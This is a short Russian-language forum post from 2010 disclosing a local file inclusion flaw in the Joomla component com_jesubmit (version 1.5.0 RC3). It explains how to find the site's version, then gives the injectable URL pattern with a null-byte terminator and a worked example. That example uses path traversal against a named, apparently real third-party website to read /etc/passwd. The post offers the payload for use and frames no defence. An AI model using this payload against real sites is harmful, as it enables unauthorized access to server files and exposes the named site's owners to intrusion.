27.06.2010, 13:16
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
1.5.0 Release Candidate 3 [LFI]
версию можно посмотреть двумя способами:
1)в файле configuration.php-dist:
@version $Id: configuration.php-dist 14401 2010-01-26 14:10:00Z louis $
2)в хтмл исходниках админки:
http://www.site.com/administrator/
теперь об уязвимости:
уязвимая функция require_once в компоненте com_jesubmit&view=,возможно провести LFI,
конструкция:
Код:
http://www.site.com/index.php?option=com_jesubmit&view=[LFI%00]
пример:
Код:
http://www.hillsborofreepress.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
|
|
|